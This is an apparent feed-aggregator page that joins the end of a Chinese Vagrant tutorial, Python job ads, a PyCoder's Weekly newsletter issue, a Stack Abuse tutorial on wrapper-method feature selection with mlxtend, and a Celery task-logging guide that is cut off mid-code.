安装方法可以有 vagrant-vbguest(注意这是vagrant插件,不是virtualbox插件),使用超级详细,只需执行vagrant plugin install vagrant-vbguest,默认从本地找 VBoxGuestAdditions.iso (各平台路径一般都可以找到),如果没找到则去http://download.virtualbox.org/virtualbox/%{version}/VBoxGuestAdditions_%{version}.iso 下载,直接启动vm便可安装或更新virtualbox guest additions ,甚至可以通过vagrant vbguest命令给正在运行的vm安装,缺点是 plugin install 得连网。下面是手动在vm内部安装:
一般最小化的box不带有CDROM,需要通过VirtualBox图形化界面添加一个DVD/CD存储设备,然后在启动VM后 Devices -> Insert Guest Additions CD 。(相信你可以可以找到办法直接挂载 .iso 文件到vm里面,免去添加多余设备)
for linux : /usr/share/virtualbox/VBoxGuestAdditions.iso
for Mac : /Applications/VirtualBox.app/Contents/MacOS/VBoxGuestAdditions.iso
for Windows : %PROGRAMFILES%/Oracle/VirtualBox/VBoxGuestAdditions.iso
1
2
3
$ sudo yum install linux-headers-$(uname -r) build-essential dkms 
$ sudo mount /dev/cdrom /media/cdrom
$ sudo sh /media/cdrom/VBoxLinuxAdditions.run --nox11

3.3.3 vagrant package

打包导出:
1
2
3
4
5
 vagrant package --output sean-vg-ct65_ts.box
==> default: Attempting graceful shutdown of VM...
==> default: Clearing any previously set forwarded ports...
==> default: Exporting VM...
==> default: Compressing package to: /Users/sean/vagrant/sean-vg-ct65_ts.box
当前目录下若存在同名package.box则会export失败。打包的来源并不是.vagrant.d而是VirtualBox虚拟机本身,可以通过--base vm-name来指定所导出的虚拟机名称,--vagrantfile file-pathname可以将Vagrantfile直接封进box中。以后就可以把这个 .box 文件分发给开发人员使用了。

4. 其他

4.1 命令

vagrant suspend将虚拟机置于休眠状态。这时候主机会保存虚拟机的当前状态。再用vagrant up启动虚拟机时能够返回之前工作的状态。这种方式优点是休眠和启动速度都很快,只有几秒钟。缺点是需要额外的磁盘空间来存储当前状态。
vagrant halt则是关机。如果想再次启动还是使用vagrant up命令,不过需要多花些时间。
vagrant destroy则会将虚拟机从磁盘中删除。如果想重新创建还是使用vagrant up命令。
vagrant reload从Vagrantfile重新启动虚拟机。
vagrant global-status输出所有虚拟机当前运行状态,关机、已启动等。
另外1.2以上版本的Vagrant还引用了插件机制。可以通过vagrant plugin来添加各种各样的plugin,这给Vagrant的应用带来了更大的灵活性和针对性。比
          Python Developer/Data Scientist - RiverPoint - Houston, TX      Cache   Translate Page      
We are looking for individuals to fill the role of Data Scientist on our model development team. This team builds the machine learning algorithms that...
From RiverPoint - Sat, 03 Nov 2018 06:30:32 GMT - View all Houston, TX jobs
          Portal Development and Wifi Engineer - RiverPoint - Philadelphia, PA      Cache   Translate Page      
Contract position - working remotely is not an option. • Experience of developing code in Php, Javascript or Python of at least 5 years • Experience of...
From RiverPoint - Tue, 30 Oct 2018 06:49:34 GMT - View all Philadelphia, PA jobs
          PyCoder’s Weekly: Issue #341 (Nov. 6, 2018)      Cache   Translate Page      
Come work on PyPI, the future of Python packaging, and more body,#bodyTable,#bodyCell{ height:100% !important; margin:0; padding:0; width:100% !important; } table{ border-collapse:collapse; } img,a img{ border:0; outline:none; text-decoration:none; } h1,h2,h3,h4,h5,h6{ margin:0; padding:0; } p{ margin:1em 0; padding:0; } a{ word-wrap:break-word; } .mcnPreviewText{ display:none !important; } .ReadMsgBody{ width:100%; } .ExternalClass{ width:100%; } .ExternalClass,.ExternalClass p,.ExternalClass span,.ExternalClass font,.ExternalClass td,.ExternalClass div{ line-height:100%; } table,td{ mso-table-lspace:0pt; mso-table-rspace:0pt; } #outlook a{ padding:0; } img{ -ms-interpolation-mode:bicubic; } body,table,td,p,a,li,blockquote{ -ms-text-size-adjust:100%; -webkit-text-size-adjust:100%; } #bodyCell{ padding:0; } .mcnImage,.mcnRetinaImage{ vertical-align:bottom; } .mcnTextContent img{ height:auto !important; } body,#bodyTable{ background-color:#F2F2F2; } #bodyCell{ border-top:0; } h1{ color:#555 !important; display:block; font-family:Helvetica; font-size:40px; font-style:normal; font-weight:bold; line-height:125%; letter-spacing:-1px; margin:0; text-align:left; } h2{ color:#404040 !important; display:block; font-family:Helvetica; font-size:26px; font-style:normal; font-weight:bold; line-height:125%; letter-spacing:-.75px; margin:0; text-align:left; } h3{ color:#555 !important; display:block; font-family:Helvetica; font-size:18px; font-style:normal; font-weight:bold; line-height:125%; letter-spacing:-.5px; margin:0; text-align:left; } h4{ color:#808080 !important; display:block; font-family:Helvetica; font-size:16px; font-style:normal; font-weight:bold; line-height:125%; letter-spacing:normal; margin:0; text-align:left; } #templatePreheader{ background-color:#3399cc; border-top:0; border-bottom:0; } .preheaderContainer .mcnTextContent,.preheaderContainer .mcnTextContent p{ color:#ffffff; font-family:Helvetica; font-size:11px; line-height:125%; text-align:left; } .preheaderContainer .mcnTextContent a{ color:#ffffff; font-weight:normal; text-decoration:underline; } #templateHeader{ background-color:#FFFFFF; border-top:0; border-bottom:0; } .headerContainer .mcnTextContent,.headerContainer .mcnTextContent p{ color:#555; font-family:Helvetica; font-size:15px; line-height:150%; text-align:left; } .headerContainer .mcnTextContent a{ color:#6DC6DD; font-weight:normal; text-decoration:underline; } #templateBody{ background-color:#FFFFFF; border-top:0; border-bottom:0; } .bodyContainer .mcnTextContent,.bodyContainer .mcnTextContent p{ color:#555; font-size:16px; line-height:150%; text-align:left; margin: 0 0 1em 0; } .bodyContainer .mcnTextContent a{ color:#6DC6DD; font-weight:normal; text-decoration:underline; } #templateFooter{ background-color:#F2F2F2; border-top:0; border-bottom:0; } .footerContainer .mcnTextContent,.footerContainer .mcnTextContent p{ color:#555; font-family:Helvetica; font-size:11px; line-height:125%; text-align:left; } .footerContainer .mcnTextContent a{ color:#555; font-weight:normal; text-decoration:underline; } @media only screen and (max-width: 480px){ body,table,td,p,a,li,blockquote{ -webkit-text-size-adjust:none !important; } } @media only screen and (max-width: 480px){ body{ width:100% !important; min-width:100% !important; } } @media only screen and (max-width: 480px){ .mcnRetinaImage{ max-width:100% !important; } } @media only screen and (max-width: 480px){ table[class=mcnTextContentContainer]{ width:100% !important; } } @media only screen and (max-width: 480px){ .mcnBoxedTextContentContainer{ max-width:100% !important; min-width:100% !important; width:100% !important; } } @media only screen and (max-width: 480px){ table[class=mcpreview-image-uploader]{ width:100% !important; display:none !important; } } @media only screen and (max-width: 480px){ img[class=mcnImage]{ width:100% !important; } } @media only screen and (max-width: 480px){ table[class=mcnImageGroupContentContainer]{ width:100% !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageGroupContent]{ padding:9px !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageGroupBlockInner]{ padding-bottom:0 !important; padding-top:0 !important; } } @media only screen and (max-width: 480px){ tbody[class=mcnImageGroupBlockOuter]{ padding-bottom:9px !important; padding-top:9px !important; } } @media only screen and (max-width: 480px){ table[class=mcnCaptionTopContent],table[class=mcnCaptionBottomContent]{ width:100% !important; } } @media only screen and (max-width: 480px){ table[class=mcnCaptionLeftTextContentContainer],table[class=mcnCaptionRightTextContentContainer],table[class=mcnCaptionLeftImageContentContainer],table[class=mcnCaptionRightImageContentContainer],table[class=mcnImageCardLeftTextContentContainer],table[class=mcnImageCardRightTextContentContainer],.mcnImageCardLeftImageContentContainer,.mcnImageCardRightImageContentContainer{ width:100% !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageCardLeftImageContent],td[class=mcnImageCardRightImageContent]{ padding-right:18px !important; padding-left:18px !important; padding-bottom:0 !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageCardBottomImageContent]{ padding-bottom:9px !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageCardTopImageContent]{ padding-top:18px !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageCardLeftImageContent],td[class=mcnImageCardRightImageContent]{ padding-right:18px !important; padding-left:18px !important; padding-bottom:0 !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageCardBottomImageContent]{ padding-bottom:9px !important; } } @media only screen and (max-width: 480px){ td[class=mcnImageCardTopImageContent]{ padding-top:18px !important; } } @media only screen and (max-width: 480px){ table[class=mcnCaptionLeftContentOuter] td[class=mcnTextContent],table[class=mcnCaptionRightContentOuter] td[class=mcnTextContent]{ padding-top:9px !important; } } @media only screen and (max-width: 480px){ td[class=mcnCaptionBlockInner] table[class=mcnCaptionTopContent]:last-child td[class=mcnTextContent],.mcnImageCardTopImageContent,.mcnCaptionBottomContent:last-child .mcnCaptionBottomImageContent{ padding-top:18px !important; } } @media only screen and (max-width: 480px){ td[class=mcnBoxedTextContentColumn]{ padding-left:18px !important; padding-right:18px !important; } } @media only screen and (max-width: 480px){ td[class=mcnTextContent]{ padding-right:18px !important; padding-left:18px !important; } } @media only screen and (max-width: 480px){ table[class=templateContainer]{ max-width:600px !important; width:100% !important; } } @media only screen and (max-width: 480px){ h1{ font-size:24px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ h2{ font-size:20px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ h3{ font-size:18px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ h4{ font-size:16px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ table[class=mcnBoxedTextContentContainer] td[class=mcnTextContent],td[class=mcnBoxedTextContentContainer] td[class=mcnTextContent] p{ font-size:18px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ table[id=templatePreheader]{ display:block !important; } } @media only screen and (max-width: 480px){ td[class=preheaderContainer] td[class=mcnTextContent],td[class=preheaderContainer] td[class=mcnTextContent] p{ font-size:14px !important; line-height:115% !important; } } @media only screen and (max-width: 480px){ td[class=headerContainer] td[class=mcnTextContent],td[class=headerContainer] td[class=mcnTextContent] p{ font-size:18px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ td[class=bodyContainer] td[class=mcnTextContent],td[class=bodyContainer] td[class=mcnTextContent] p{ font-size:18px !important; line-height:125% !important; } } @media only screen and (max-width: 480px){ td[class=footerContainer] td[class=mcnTextContent],td[class=footerContainer] td[class=mcnTextContent] p{ font-size:14px !important; line-height:115% !important; } } @media only screen and (max-width: 480px){ td[class=footerContainer] a[class=utilityLink]{ display:block !important; } }
PSF: Upcoming Contract Work on PyPI
#341 – NOVEMBER 6, 2018 VIEW IN BROWSER
The PyCoder’s Weekly Logo
PSF: Upcoming Contract Work on PyPI
If you have experience with security features or localization features in Python codebases, this is an opportunity to get involved with PyPI. You can register your interest to participate as a contractor online. The project begins in January 2019.
PYTHON SOFTWARE FOUNDATION

The Best Flake8 Extensions for Your Python Project
The flake8 code linter supports plugins that can check for additional rule violations. This post goes into the author’s favorite plugins. I didn’t know flake8-import-order was a thing and I will definitely try this out in my own projects.
JULIEN DANJOU

“Deal With It” Meme GIF Generator Using Python + OpenCV
How to create animated GIFs using OpenCV, Python, and ImageMagick. Super-detailed tutorial and the results are awesome.
ADRIAN ROSEBROCK

Find a Python Job Through Vettery
alt Vettery specializes in developer roles and is completely free for job seekers. Interested? Submit your profile, and if accepted onto the platform, you can receive interview requests directly from top companies seeking Python developers. Get Started.
VETTERYsponsor

Python 2.7 Halloween Facepaint
Scary!
REDDIT.COM

Writing Comments in Python (Guide)
How to write Python comments that are clean, concise, and useful. Get up to speed on what the best practices are, which types of comments it’s best to avoid, and how you can practice writing cleaner comments.
REAL PYTHON

pyproject.toml: The Future of Python Packaging
Deep dive with Brett Cannon into changes to Python packaging such as pyproject.toml, PEP 517, 518, and the implications of these changes. Lots of things happening in that area and this interview is a great way to stay up to date.
TESTANDCODE.COM podcast

Crash Reporting in Desktop Python Applications
The Dropbox desktop client is partly written in Python. This post goes into how their engineering teams do live crash-reporting in their desktop app. Also check out the related slide deck.
DROPBOX.COM


Discussions


When to Use @staticmethod vs Writing a Plain Function?
MAIL.PYTHON.ORG

Can a Non-Python-Programmer Set Up a Django Website With a Few Hours of Practice?
REDDIT.COM

Python Interview Question Post-Mortem
The question was how to merge two lists together in Python (without duplicates.) Interviewers want to see a for-loop solution, even though it’s much slower than what the applicant came up with initially. Good read on what to do/what to avoid if you have a coding interview coming up.
REDDIT.COM

I Just Got a $67k Job Before I Even Graduated, All Thanks to Python
REDDIT.COM


Python Jobs


Senior Software Engineer - Full Stack (Raleigh, North Carolina)
SUGARCRM

Head of Engineering (Remote, Work from Anywhere)
FINDKEEP.LOVE

Senior Developer (Chicago, Illinois)
PANOPTA

Senior Software Engineer (Los Angeles, California)
GOODRX

More Python Jobs >>>


Articles & Tutorials


Setting Up Python for Machine Learning on Windows
In this step-by-step tutorial, you’ll cover the basics of setting up a Python numerical computation environment for machine learning on a Windows machine using the Anaconda Python distribution.
REAL PYTHON

Diving Into Pandas Is Faster Than Reinventing It
How modern Pandas makes your life easier by making your code easier to read—and easier to write.
DEAN LANGSAM • Shared by Dean Langsam

“Ultimate Programmer Super Stack” Bundle [90% off]
Become a well-rounded developer with this book & course bundle. Includes 25+ quality resources for less than $2 each. If you’re looking to round out your reading list for the cold months of the year, this is a great deal. Available this week only.
INFOSTACK.IO sponsor

Structure of a Flask Project
Suggestions for the folder structure of a Flask project. Nice and clean!
LEPTURE.COM • Shared by Python Bytes FM

Dockerizing Django With Postgres, Gunicorn, and Nginx
How to configure Django to run on Docker along with PostgreSQL, Nginx, and Gunicorn.
MICHAEL HERMAN

Making Python Project Executables With PEX
PEX files are distributable Python environments you can use to build executables for your project. These executables can then be copied to the target host and executed there without requiring an install step. This tutorial goes into how to build a PEX file for a simple Click CLI app.
PETER DEMIN

I Was Looking for a House, So I Built a Web Scraper in Python
MEDIUM.COM/@FNEVES • Shared by Ricky White

A Gentle Visual Intro to Data Analysis in Python Using Pandas
Short & sweet intro to basic Pandas concepts. Lots of images and visualizations in there make the article an easy read.
JAY ALAMMAR

Packaging and Developing Python Projects With Nested Git-Submodules
Working with repositories that have nested Git submodules of arbitrary depth, in the context of a Python project. Personally I’m having a hard time working effectively with Git submodules, but if they’re a good fit for your use case check out this article.
KONSTANTINOS DEMARTINOS

Python vs NumPy vs Nim Performance Comparison
Also check out the related discussion on Reddit.
NARIMIRAN.GITHUB.IO

Speeding Up JSON Schema Validation in Python
PETERBE.COM

Careful With Negative Assertions
A cautionary tale about testing that things are unequal…
NED BATCHELDER

Data Manipulation With Pandas: A Brief Tutorial
Covers three basic data manipulation techniques with Pandas: Modifying a DataFrame using the inplace parameter, grouping using groupby(), and handling missing data.
ERIK MARSJA

Full-Stack Developers, Unicorns and Other Mythological Beings
What’s a “Full-Stack” developer anyway?
MEDIUM.COM/DATADRIVENINVESTOR • Shared by Ricky White

Writing Custom Celery Task Loggers
The celery.task logger is used for logging task-specific information, which is useful if you need to know which task a log message came from.
BJOERN STIEL

Generating Software Tests Automatically
An online textbook on automating software testing, specifically by generating tests automatically. Covers random fuzzing, mutation-based fuzzing, grammar-based test generation, symbolic testing, and more. Examples use Python.
FUZZINGBOOK.ORG

Custom User Models in Django
How and why to add a custom user model to your Django project.
WSVINCENT.COM • Shared by Ricky White


Projects & Code


Vespene: Python CI/CD and Automation Server Written in Django
VESPENE.IO

zulu: A Drop-In Replacement for Native Python Datetimes That Embraces UTC
A drop-in replacement for native datetime objects that always uses UTC. Makes it easy to reason about zulu objects. Also conveniently parses ISO8601 and timestamps by default without any extra arguments.
DERRICK GILLAND • Shared by Derrick Gilland

My Python Examples (Scripts)
Little scripts and tools written by someone who says they’re “not a programmer.” Maybe the code quality isn’t perfect here—but hey, if you’re looking for problems to solve with Python, why not do something similar or contribute to this project by improving the scripts?
GITHUB.COM/GEEKCOMPUTERS

termtosvg: Record Terminal Sessions as SVG Animations
A Unix terminal recorder written in Python that renders your command line sessions as standalone SVG animations.
GITHUB.COM/NBEDOS

CPython Speed Center
A performance analysis tool for CPython. It shows performance regressions and allows comparing different applications or implementations over time.
SPEED.PYTHON.ORG

ase: Atomic Simulation Environment
A Python library for working with atoms. There’s a library on PyPI for everything…
GITLAB.COM/ASE

Various Pandas Solutions and Examples
PYTHONPROGRAMMING.IN • Shared by @percy_io

pymc-learn: Probabilistic Models for Machine Learning
Uses a familiar scikit-learn syntax.
PYMC-LEARN.ORG

ReviewNB: Jupyter Notebook Diff for GitHub
HTML-rendered diffs for Jupyter Notebooks. Say goodbye to messy JSON diffs and collaborate on notebooks via review comments.
REVIEWNB.COM


Events


Python LX
14 Nov. in Lisbon, Portugal
PYTHON.ORG

PyData Bristol Meetup (Nov 13)
PYTHON.ORG

Python Miami
10 Nov. – 11 Nov. in Miami, FL.
PYTHON.ORG

Happy Pythoning!
Copyright © 2018 PyCoder’s Weekly, All rights reserved.
alt

[ Subscribe to 🐍 PyCoder’s Weekly 💌 – Get the best Python news, articles, and tutorials delivered to your inbox once a week >> Click here to learn more ]


          Stack Abuse: Applying Wrapper Methods in Python for Feature Selection      Cache   Translate Page      

Introduction

In the previous article, we studied how we can use filter methods for feature selection for machine learning algorithms. Filter methods are handy when you want to select a generic set of features for all the machine learning models.

However, in some scenarios, you may want to use a specific machine learning algorithm to train your model. In such cases, features selected through filter methods may not be the most optimal set of features for that specific algorithm. There is another category of feature selection methods that select the most optimal features for the specified algorithm. Such methods are called wrapper methods.

Wrapper Methods for Feature Selection

Wrapper methods are based on greedy search algorithms as they evaluate all possible combinations of the features and select the combination that produces the best result for a specific machine learning algorithm. A downside to this approach is that testing all possible combinations of the features can be computationally very expensive, particularly if the feature set is very large.

As said earlier, wrapper methods can find the best set of features for a specific algorithm - however, a downside is that these set of features may not be optimal for every other machine learning algorithm.

Wrapper methods for feature selection can be divided into three categories: Step forward feature selection, Step backwards feature selection and Exhaustive feature selection. In this article, we will see how we can implement these feature selection approaches in Python.

Step Forward Feature Selection

In the first phase of the step forward feature selection, the performance of the classifier is evaluated with respect to each feature. The feature that performs the best is selected out of all the features.

In the second step, the first feature is tried in combination with all the other features. The combination of two features that yield the best algorithm performance is selected. The process continues until the specified number of features are selected.

Let's implement step forward feature selection in Python. We will be using the BNP Paribas Cardif Claims Management dataset for this section as we did in our previous article.

To implement step forward feature selection, we need to convert categorical feature values into numeric feature values. However, for the sake of simplicity, we will remove all the non-categorical columns from our data. We will also remove the correlated columns as we did in the previous article so that we have a small feature set to process.

Data Preprocessing

The following script imports the dataset and the required libraries, it then removes the non-numeric columns from the dataset and then divides the dataset into training and testing sets. Finally, all the columns with a correlation of greater than 0.8 are removed. Take a look at this article for the detailed explanation of this script:

import pandas as pd  
import numpy as np  
from sklearn.model_selection import train_test_split  
from sklearn.feature_selection import VarianceThreshold

paribas_data = pd.read_csv(r"E:\Datasets\paribas_data.csv", nrows=20000)  
paribas_data.shape

num_colums = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']  
numerical_columns = list(paribas_data.select_dtypes(include=num_colums).columns)  
paribas_data = paribas_data[numerical_columns]  
paribas_data.shape

train_features, test_features, train_labels, test_labels = train_test_split(  
    paribas_data.drop(labels=['target', 'ID'], axis=1),
    paribas_data['target'],
    test_size=0.2,
    random_state=41)

correlated_features = set()  
correlation_matrix = paribas_data.corr()  
for i in range(len(correlation_matrix .columns)):  
    for j in range(i):
        if abs(correlation_matrix.iloc[i, j]) > 0.8:
            colname = correlation_matrix.columns[i]
            correlated_features.add(colname)


train_features.drop(labels=correlated_features, axis=1, inplace=True)  
test_features.drop(labels=correlated_features, axis=1, inplace=True)

train_features.shape, test_features.shape  
Implementing Step Forward Feature Selection in Python

To select the most optimal features, we will be using SequentialFeatureSelector function from the mlxtend library. The library can be downloaded executing the following command at anaconda command prompt:

conda install -c conda-forge mlxtend  

We will use the Random Forest Classifier to find the most optimal parameters. The evaluation criteria used will be ROC-AUC. The following script selects the 15 features from our dataset that yields best performance for random forest classifier:

from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier  
from sklearn.metrics import roc_auc_score

from mlxtend.feature_selection import SequentialFeatureSelector

feature_selector = SequentialFeatureSelector(RandomForestClassifier(n_jobs=-1),  
           k_features=15,
           forward=True,
           verbose=2,
           scoring='roc_auc',
           cv=4)

In the script above we pass the RandomForestClassifieras the estimator to the SequentialFeatureSelector function. The k_features specifies the number of features to select. You can set any number of features here. The forward parameter, if set to True, performs step forward feature selection. The verbose parameter is used for logging the progress of the feature selector, the scoring parameter defines the performance evaluation criteria and finally, cv refers to cross-validation folds.

We created our feature selector, now we need to call the fit method on our feature selector and pass it the training and test sets as shown below:

features = feature_selector.fit(np.array(train_features.fillna(0)), train_labels)  

Depending upon your system hardware, the above script can take some time to execute. Once the above script finishes executing, you can execute the following script to see the 15 selected features:

filtered_features= train_features.columns[list(features.k_feature_idx_)]  
filtered_features  

In the output, you should see the following features:

Index(['v4', 'v10', 'v14', 'v15', 'v18', 'v20', 'v23', 'v34', 'v38', 'v42',  
       'v50', 'v51', 'v69', 'v72', 'v129'],
      dtype='object')

Now to see the classification performance of the random forest algorithm using these 15 features, execute the following script:

clf = RandomForestClassifier(n_estimators=100, random_state=41, max_depth=3)  
clf.fit(train_features[filtered_features].fillna(0), train_labels)

train_pred = clf.predict_proba(train_features[filtered_features].fillna(0))  
print('Accuracy on training set: {}'.format(roc_auc_score(train_labels, train_pred[:,1])))

test_pred = clf.predict_proba(test_features[filtered_features].fillna(0))  
print('Accuracy on test set: {}'.format(roc_auc_score(test_labels, test_pred [:,1])))  

In the script above, we train our random forest algorithm on the 15 features that we selected using the step forward feature selection and then we evaluated the performance of our algorithm on the training and testing sets. In the output, you should see the following results:

Accuracy on training set: 0.7072327148174093  
Accuracy on test set: 0.7096973252804142  

You can see that the accuracy on training and test sets is pretty similar which means that our model is not overfitting.

Step Backwards Feature Selection

Step backwards feature selection, as the name suggests is the exact opposite of step forward feature selection that we studied in the last section. In the first step of the step backwards feature selection, one feature is removed in round-robin fashion from the feature set and the performance of the classifier is evaluated.

The feature set that yields the best performance is retained. In the second step, again one feature is removed in a round-robin fashion and the performance of all the combination of features except the 2 features is evaluated. This process continues until the specified number of features remain in the dataset.

Step Backwards Feature Selection in Python

In this section, we will implement the step backwards feature selection on the BNP Paribas Cardif Claims Management. The preprocessing step will remain the same as the previous section. The only change will be in the forward parameter of the SequentiaFeatureSelector class. In case of the step backwards feature selection, we will set this parameter to False. Execute the following script:

from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier  
from sklearn.metrics import roc_auc_score  
from mlxtend.feature_selection import SequentialFeatureSelector

feature_selector = SequentialFeatureSelector(RandomForestClassifier(n_jobs=-1),  
           k_features=15,
           forward=False,
           verbose=2,
           scoring='roc_auc',
           cv=4)

features = feature_selector.fit(np.array(train_features.fillna(0)), train_labels)  

To see the feature selected as a result of step backwards elimination, execute the following script:

filtered_features= train_features.columns[list(features.k_feature_idx_)]  
filtered_features  

The output looks like this:

Index(['v7', 'v8', 'v10', 'v17', 'v34', 'v38', 'v45', 'v50', 'v51', 'v61',  
       'v94', 'v99', 'v119', 'v120', 'v129'],
      dtype='object')

Finally, let's evaluate the performance of our random forest classifier on the features selected as a result of step backwards feature selection. Execute the following script:

clf = RandomForestClassifier(n_estimators=100, random_state=41, max_depth=3)  
clf.fit(train_features[filtered_features].fillna(0), train_labels)

train_pred = clf.predict_proba(train_features[filtered_features].fillna(0))  
print('Accuracy on training set: {}'.format(roc_auc_score(train_labels, train_pred[:,1])))

test_pred = clf.predict_proba(test_features[filtered_features].fillna(0))  
print('Accuracy on test set: {}'.format(roc_auc_score(test_labels, test_pred [:,1])))  

The output looks likes that:

Accuracy on training set: 0.7095207938140247  
Accuracy on test set: 0.7114624676445211  

You can see that the performance achieved on the training set is similar to that achieved using step forward feature selection. However, on the test set, backward feature selection performed slightly better.

Exhaustive Feature Selection

In exhaustive feature selection, the performance of a machine learning algorithm is evaluated against all possible combinations of the features in the dataset. The feature subset that yields best performance is selected. The exhaustive search algorithm is the most greedy algorithm of all the wrapper methods since it tries all the combination of features and selects the best.

A downside to exhaustive feature selection is that it can be slower compared to step forward and step backward method since it evaluates all feature combinations.

Exhaustive Feature Selection in Python

In this section, we will implement the step backwards feature selection on the BNP Paribas Cardif Claims Management. The preprocessing step will remain the similar to that of Step forward feature selection.

To implement exhaustive feature selection, we will be using ExhaustiveFeatureSelector function from the mlxtend.feature_selection library. The class has min_featuresand max_features attributes which can be used to specify the minimum and the maximum number of features in the combination.

Execute the following script:

from mlxtend.feature_selection import ExhaustiveFeatureSelector  
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier  
from sklearn.metrics import roc_auc_score

feature_selector = ExhaustiveFeatureSelector(RandomForestClassifier(n_jobs=-1),  
           min_features=2,
           max_features=4,
           scoring='roc_auc',
           print_progress=True,
           cv=2)

We created our feature selector, now need to call the fit method on our feature selector and pass it the training and test sets as shown below:

features = feature_selector.fit(np.array(train_features.fillna(0)), train_labels)  

Note that the above script can take quite a bit of time to execute. To see the feature selected as a result of step backwards elimination, execute the following script:

filtered_features= train_features.columns[list(features.k_feature_idx_)]  
filtered_features  

Finally, to see the performance of random forest classifier on the features selected as a result of exhaustive feature selection. Execute the following script:

clf = RandomForestClassifier(n_estimators=100, random_state=41, max_depth=3)  
clf.fit(train_features[filtered_features].fillna(0), train_labels)

train_pred = clf.predict_proba(train_features[filtered_features].fillna(0))  
print('Accuracy on training set: {}'.format(roc_auc_score(train_labels, train_pred[:,1])))

test_pred = clf.predict_proba(test_features[filtered_features].fillna(0))  
print('Accuracy on test set: {}'.format(roc_auc_score(test_labels, test_pred [:,1])))  

Conclusion

Wrapper methods are some of the most important algorithms used for feature selection for a specific machine learning algorithm. In this article, we studied different types of wrapper methods along with their practical implementation. We studied step forward, step backwards and exhaustive methods for feature selection.

As a rule of thumb, if the dataset is small, exhaustive feature selection method should be the choice, however, in case of large datasets, step forward or step backward feature selection methods should be preferred.


          Python Celery - Weekly Celery Tutorials and How-tos: Quick Guide: Custom Celery Task Logger      Cache   Translate Page      

I previously wrote about how to customise your Celery log handlers. But there is another Celery logger, the celery.task logger. The celery.task logger is a special logger set up by the Celery worker. Its goal is to add task-related information to the log messages. It exposes two new parameters:

  • task_id
  • task_name

This is useful because it helps you understand which task a log message comes from. The task logger is available via celery.utils.log.

# tasks.py
import os
from celery.utils.log import get_task_logger
from worker import app


logger = get_task_logger(__name__)


@app.task()
def add(x, y):
    result = x + y
    logger.info(f'Add: {x} + {y} = {result}')
    return result

Executing the add task with get_task_logger produces the following log output.

[2018-11-06 07:30:13,545: INFO/MainProcess] Received task: tasks.get_request[9c332222-d2fc-47d9-adc3-04cebbe145cb]
[2018-11-06 07:30:13,546: INFO/MainProcess] tasks.get_request[9c332222-d2fc-47d9-adc3-04cebbe145cb]: Add: 3 + 5 = 8
[2018-11-06 07:30:13,598: INFO/MainProcess] Task tasks.get_request[9c332222-d2fc-47d9-adc3-04cebbe145cb] succeeded in 0.052071799989789724s: None

If your Celery application processes many tasks, the celery.task logger is almost indispensable to make sense of your log output. Compare this to the log message generated by the standard logging.getLogger:

[2018-11-06 07:33:16,140: INFO/MainProcess] Received task: tasks.get_request[7d2ec1a7-0af2-4e8c-8354-02cd0975c906]
[2018-11-06 07:33:16,140: INFO/MainProcess] Add: 3 + 5 = 8
[2018-11-06 07:33:16,193: INFO/MainProcess] Task tasks.get_request[7d2ec1a7-0af2-4e8c-8354-02cd0975c906] succeeded in 0.052330999984405935s: None

How to customise the celery.task log format

How do you customise the celery.task log message format? Remember how you customise the Celery logger using the after_setup_logger signal? There is a similar signal for the celery.task logger. The after_setup_task_logger signal gets triggered as soon as Celery worker has set up the celery.task logger. This is the signal we want to connect to in order to customise the log formatter.

There is one gotcha: In order to get access to task_id and task_name, you have to use celery.app.log.TaskFormatter instead of logging.Formatter. celery.app.log.TaskFormatter is an extension of logging.Formatter and gets a reference to the current Celery task at runtime (check out the source code if you want to take a deeper dive).

# worker.py
import os
from celery import Celery
from celery.signals import after_setup_task_logger
from celery.app.log import TaskFormatter


app = Celery()


@after_setup_task_logger.connect
def setup_task_logger(logger, *args, **kwargs):
    for handler in logger.handlers:
        handler.setFormatter(TaskFormatter('%(asctime)s - %(task_id)s - %(task_name)s - %(name)s - %(levelname)s - %(message)s'))

How to get the task_id using the standard logger?

The celery.task logger works great for anything which is definitely a Celery task. But what about lower-level code? Models, for example, are usually used both in a Celery and non-Celery context. If your front-of-the-house is a Flask web application, your models can be used either in the Flask or Celery process.

# models.py
import logging

from passlib.hash import sha256_crypt
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import validates
from sqlalchemy import text
from . import db


logger = logging.getLogger(__name__)


class User(db.Model):
    __tablename__ = 'users'
    id = db.Column(UUID(as_uuid=True), primary_key=True, server_default=text("uuid_generate_v4()"))
    name = db.Column(db.String(64), unique=False, nullable=True)
    email = db.Column(db.String(256), unique=True, nullable=False)

    @validates('email')
    def validate_email(self, key, value):
        logger.info(f'Validate email address: {value}')
        if value is not None:
            assert '@' in value
            return value.lower()

Your lower-level code should not care in which context it runs. You do not want to pollute it with a Celery-specific logger implementation. What you do want is to get the Celery task id in the log message when validate_email is called from within a Celery task. And no task id when validate_email is called from within Flask.

Good news is, you can do this with a simple trick. celery.app.log.TaskFormatter does the magic that injects task_id and task_name. It does so by calling celery._state.get_current_task. If celery._state.get_current_task is executed outside a Celery task, it simply returns None. When the task is None celery.app.log.TaskFormatter handles by printing ??? instead of the task_id and task_name. This means you can safely create your log handler outside Celery using _celery.app.log.TaskFormatter.

import logging
from celery.app.log import TaskFormatter

logger = logging.getLogger()
sh = logging.StreamHandler()
sh.setFormatter(TaskFormatter('%(asctime)s - %(task_id)s - %(task_name)s - %(name)s - %(levelname)s - %(message)s'))
logger.setLevel(logging.INFO)
logger.addHandler(sh)

If you don’t like the ??? defaults or the fact that you have to import from celery.app.log, write your own custom task formatter.

import logging


class TaskFormatter(logging.Formatter):

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        try:
            from celery._state import get_current_task
